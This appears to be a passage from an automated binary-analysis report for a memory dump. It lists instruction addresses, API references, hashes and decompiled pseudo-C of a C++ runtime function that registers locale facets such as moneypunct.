0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288

APIs

__EH_prolog3.LIBCMT ref: 6E199251
std::_Lockit::_Lockit.LIBCPMT ref: 6E19925B

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E199295
std::_Facet_Register.LIBCPMT ref: 6E1992AC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1992CC
Concurrency::cancel_current_task.LIBCPMT ref: 6E1992D9

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 74bc4b038c1c5ae1261b67a037225e2999d05330a7ec4a7f660dc308ba1fd581
Instruction ID: 362467e3f6c30ec5c52ba7210d1a02f663c517a444eae956154af8f8e17132a0
Opcode Fuzzy Hash: 74bc4b038c1c5ae1261b67a037225e2999d05330a7ec4a7f660dc308ba1fd581
Instruction Fuzzy Hash: 0B01C4799005199FCB05DBE4C8246FD7779AF84314F240809E811AB280DF309AC8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1992DF, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1992DF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t146;
				void* _t261;
				signed int _t380;
				void* _t414;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				void* _t451;

				_t314 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t451 - 0x14, 0);
				_t428 =  *0x6e22172c; // 0x0
				 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
				 *(_t451 - 0x10) = _t428;
				_t146 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(__ebx, 0x6e2216d8, __edi, _t428));
				_t416 = _t146;
				if(_t146 != 0) {
					L5:
					E6E18F30C(_t451 - 0x14);
					return E6E1A9D88(_t416);
				} else {
					if(_t428 == 0) {
						_push( *((intOrPtr*)(_t451 + 8)));
						_push(_t451 - 0x10);
						__eflags = E6E19ADF7(__ebx, _t416, _t428) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t314, _t416, _t428, 8);
							E6E18F2A5(_t451 - 0x14, 0);
							_t429 =  *0x6e221700; // 0x0
							 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
							 *(_t451 - 0x10) = _t429;
							_t417 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216b4, _t416, _t429));
							__eflags = _t417;
							if(_t417 != 0) {
								L12:
								E6E18F30C(_t451 - 0x14);
								return E6E1A9D88(_t417);
							} else {
								__eflags = _t429;
								if(_t429 == 0) {
									_push( *((intOrPtr*)(_t451 + 8)));
									_push(_t451 - 0x10);
									__eflags = E6E19AE7C(_t314, _t417, _t429) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t314, _t417, _t429, 8);
										E6E18F2A5(_t451 - 0x14, 0);
										_t430 =  *0x6e2216fc; // 0x0
										 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
										 *(_t451 - 0x10) = _t430;
										_t418 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216b0, _t417, _t430));
										__eflags = _t418;
										if(_t418 != 0) {
											L19:
											E6E18F30C(_t451 - 0x14);
											return E6E1A9D88(_t418);
										} else {
											__eflags = _t430;
											if(_t430 == 0) {
												_push( *((intOrPtr*)(_t451 + 8)));
												_push(_t451 - 0x10);
												__eflags = E6E19AF00(_t314, _t418, _t430) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t314, _t418, _t430, 8);
													E6E18F2A5(_t451 - 0x14, 0);
													_t431 =  *0x6e221710; // 0x0
													 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
													 *(_t451 - 0x10) = _t431;
													_t419 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216bc, _t418, _t431));
													__eflags = _t419;
													if(_t419 != 0) {
														L26:
														E6E18F30C(_t451 - 0x14);
														return E6E1A9D88(_t419);
													} else {
														__eflags = _t431;
														if(_t431 == 0) {
															_push( *((intOrPtr*)(_t451 + 8)));
															_push(_t451 - 0x10);
															__eflags = E6E19AF85(_t314, _t419, _t431) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t314, _t419, _t431, 8);
																E6E18F2A5(_t451 - 0x14, 0);
																_t432 =  *0x6e2216e8; // 0x0
																 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																 *(_t451 - 0x10) = _t432;
																_t420 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e22169c, _t419, _t432));
																__eflags = _t420;
																if(_t420 != 0) {
																	L33:
																	E6E18F30C(_t451 - 0x14);
																	return E6E1A9D88(_t420);
																} else {
																	__eflags = _t432;
																	if(_t432 == 0) {
																		_push( *((intOrPtr*)(_t451 + 8)));
																		_push(_t451 - 0x10);
																		__eflags = E6E19AFED(_t314, _t420, _t432) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t314, _t420, _t432, 8);
																			E6E18F2A5(_t451 - 0x14, 0);
																			_t433 =  *0x6e221714; // 0x0
																			 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																			 *(_t451 - 0x10) = _t433;
																			_t421 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216c0, _t420, _t433));
																			__eflags = _t421;
																			if(_t421 != 0) {
																				L40:
																				E6E18F30C(_t451 - 0x14);
																				return E6E1A9D88(_t421);
																			} else {
																				__eflags = _t433;
																				if(_t433 == 0) {
																					_push( *((intOrPtr*)(_t451 + 8)));
																					_push(_t451 - 0x10);
																					__eflags = E6E19B055(_t314, _t421, _t433) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t314, _t421, _t433, 8);
																						E6E18F2A5(_t451 - 0x14, 0);
																						_t434 =  *0x6e221718; // 0x0
																						 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																						 *(_t451 - 0x10) = _t434;
																						_t422 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216c4, _t421, _t434));
																						__eflags = _t422;
																						if(_t422 != 0) {
																							L47:
																							E6E18F30C(_t451 - 0x14);
																							return E6E1A9D88(_t422);
																						} else {
																							__eflags = _t434;
																							if(_t434 == 0) {
																								_push( *((intOrPtr*)(_t451 + 8)));
																								_push(_t451 - 0x10);
																								__eflags = E6E19B0BD(_t314, _t422, _t434) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t314, _t422, _t434, 8);
																									E6E18F2A5(_t451 - 0x14, 0);
																									_t435 =  *0x6e221734; // 0x0
																									 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																									 *(_t451 - 0x10) = _t435;
																									_t423 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216e0, _t422, _t435));
																									__eflags = _t423;
																									if(_t423 != 0) {
																										L54:
																										E6E18F30C(_t451 - 0x14);
																										return E6E1A9D88(_t423);
																									} else {
																										__eflags = _t435;
																										if(_t435 == 0) {
																											_push( *((intOrPtr*)(_t451 + 8)));
																											_push(_t451 - 0x10);
																											__eflags = E6E19B138(_t314, _t423, _t435) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t314, _t423, _t435, 8);
																												E6E18F2A5(_t451 - 0x14, 0);
																												_t436 =  *0x6e221704; // 0x0
																												 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																												 *(_t451 - 0x10) = _t436;
																												_t424 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216b8, _t423, _t436));
																												__eflags = _t424;
																												if(_t424 != 0) {
																													L61:
																													E6E18F30C(_t451 - 0x14);
																													return E6E1A9D88(_t424);
																												} else {
																													__eflags = _t436;
																													if(_t436 == 0) {
																														_push( *((intOrPtr*)(_t451 + 8)));
																														_push(_t451 - 0x10);
																														__eflags = E6E19B1A4(_t314, _t424, _t436) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t314, _t424, _t436, 8);
																															E6E18F2A5(_t451 - 0x14, 0);
																															_t437 =  *0x6e221738; // 0x0
																															 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																															 *(_t451 - 0x10) = _t437;
																															_t425 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e2216e4, _t424, _t437));
																															__eflags = _t425;
																															if(_t425 != 0) {
																																L68:
																																E6E18F30C(_t451 - 0x14);
																																return E6E1A9D88(_t425);
																															} else {
																																__eflags = _t437;
																																if(_t437 == 0) {
																																	_push( *((intOrPtr*)(_t451 + 8)));
																																	_push(_t451 - 0x10);
																																	__eflags = E6E19B210(_t314, _t425, _t437) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t314, _t425, _t437, 8);
																																		E6E18F2A5(_t451 - 0x14, 0);
																																		_t438 =  *0x6e221708; // 0x0
																																		 *(_t451 - 4) =  *(_t451 - 4) & 0x00000000;
																																		 *(_t451 - 0x10) = _t438;
																																		_t426 = E6E162171( *((intOrPtr*)(_t451 + 8)), E6E161F29(_t314, 0x6e221698, _t425, _t438));
																																		__eflags = _t426;
																																		if(_t426 != 0) {
																																			L75:
																																			E6E18F30C(_t451 - 0x14);
																																			return E6E1A9D88(_t426);
																																		} else {
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				_push( *((intOrPtr*)(_t451 + 8)));
																																				_push(_t451 - 0x10);
																																				_t261 = E6E19B284(_t314, _t426, _t438);
																																				_pop(_t380);
																																				__eflags = _t261 - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ecb1a, _t314, _t426, _t438, 4);
																																					_t439 = _t380;
																																					 *(_t451 - 0x10) = _t439;
																																					 *((intOrPtr*)(_t439 + 4)) =  *((intOrPtr*)(_t451 + 0xc));
																																					_push( *((intOrPtr*)(_t451 + 0x14)));
																																					_t139 = _t451 - 4;
																																					 *_t139 =  *(_t451 - 4) & 0x00000000;
																																					__eflags =  *_t139;
																																					 *_t439 = 0x6e1f225c;
																																					 *((char*)(_t439 + 0x28)) =  *((intOrPtr*)(_t451 + 0x10));
																																					E6E19F3D8(_t314, _t380, _t414, _t426, _t439,  *_t139);
																																					return E6E1A9D88(_t439,  *((intOrPtr*)(_t451 + 8)));
																																				} else {
																																					_t426 =  *(_t451 - 0x10);
																																					 *(_t451 - 0x10) = _t426;
																																					 *(_t451 - 4) = 1;
																																					E6E1911C1(__eflags, _t426);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t426 + 4))))();
																																					 *0x6e221708 = _t426;
																																					goto L75;
																																				}
																																			} else {
																																				_t426 = _t438;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t425 =  *(_t451 - 0x10);
																																		 *(_t451 - 0x10) = _t425;
																																		 *(_t451 - 4) = 1;
																																		E6E1911C1(__eflags, _t425);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t425 + 4))))();
																																		 *0x6e221738 = _t425;
																																		goto L68;
																																	}
																																} else {
																																	_t425 = _t437;
																																	goto L68;
																																}
																															}
																														} else {
																															_t424 =  *(_t451 - 0x10);
																															 *(_t451 - 0x10) = _t424;
																															 *(_t451 - 4) = 1;
																															E6E1911C1(__eflags, _t424);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t424 + 4))))();
																															 *0x6e221704 = _t424;
																															goto L61;
																														}
																													} else {
																														_t424 = _t436;
																														goto L61;
																													}
																												}
																											} else {
																												_t423 =  *(_t451 - 0x10);
																												 *(_t451 - 0x10) = _t423;
																												 *(_t451 - 4) = 1;
																												E6E1911C1(__eflags, _t423);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t423 + 4))))();
																												 *0x6e221734 = _t423;
																												goto L54;
																											}
																										} else {
																											_t423 = _t435;
																											goto L54;
																										}
																									}
																								} else {
																									_t422 =  *(_t451 - 0x10);
																									 *(_t451 - 0x10) = _t422;
																									 *(_t451 - 4) = 1;
																									E6E1911C1(__eflags, _t422);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t422 + 4))))();
																									 *0x6e221718 = _t422;
																									goto L47;
																								}
																							} else {
																								_t422 = _t434;
																								goto L47;
																							}
																						}
																					} else {
																						_t421 =  *(_t451 - 0x10);
																						 *(_t451 - 0x10) = _t421;
																						 *(_t451 - 4) = 1;
																						E6E1911C1(__eflags, _t421);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t421 + 4))))();
																						 *0x6e221714 = _t421;
																						goto L40;
																					}
																				} else {
																					_t421 = _t433;
																					goto L40;
																				}
																			}
																		} else {
																			_t420 =  *(_t451 - 0x10);
																			 *(_t451 - 0x10) = _t420;
																			 *(_t451 - 4) = 1;
																			E6E1911C1(__eflags, _t420);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t420 + 4))))();
																			 *0x6e2216e8 = _t420;
																			goto L33;
																		}
																	} else {
																		_t420 = _t432;
																		goto L33;
																	}
																}
															} else {
																_t419 =  *(_t451 - 0x10);
																 *(_t451 - 0x10) = _t419;
																 *(_t451 - 4) = 1;
																E6E1911C1(__eflags, _t419);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t419 + 4))))();
																 *0x6e221710 = _t419;
																goto L26;
															}
														} else {
															_t419 = _t431;
															goto L26;
														}
													}
												} else {
													_t418 =  *(_t451 - 0x10);
													 *(_t451 - 0x10) = _t418;
													 *(_t451 - 4) = 1;
													E6E1911C1(__eflags, _t418);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t418 + 4))))();
													 *0x6e2216fc = _t418;
													goto L19;
												}
											} else {
												_t418 = _t430;
												goto L19;
											}
										}
									} else {
										_t417 =  *(_t451 - 0x10);
										 *(_t451 - 0x10) = _t417;
										 *(_t451 - 4) = 1;
										E6E1911C1(__eflags, _t417);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t417 + 4))))();
										 *0x6e221700 = _t417;
										goto L12;
									}
								} else {
									_t417 = _t429;
									goto L12;
								}
							}
						} else {
							_t416 =  *(_t451 - 0x10);
							 *(_t451 - 0x10) = _t416;
							 *(_t451 - 4) = 1;
							E6E1911C1(__eflags, _t416);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t416 + 4))))();
							 *0x6e22172c = _t416;
							goto L5;
						}
					} else {
						_t416 = _t428;
						goto L5;
					}
				}
			}

0x6e1992df
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199310
0x6e199315
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d

APIs

__EH_prolog3.LIBCMT ref: 6E1992E6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1992F0

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
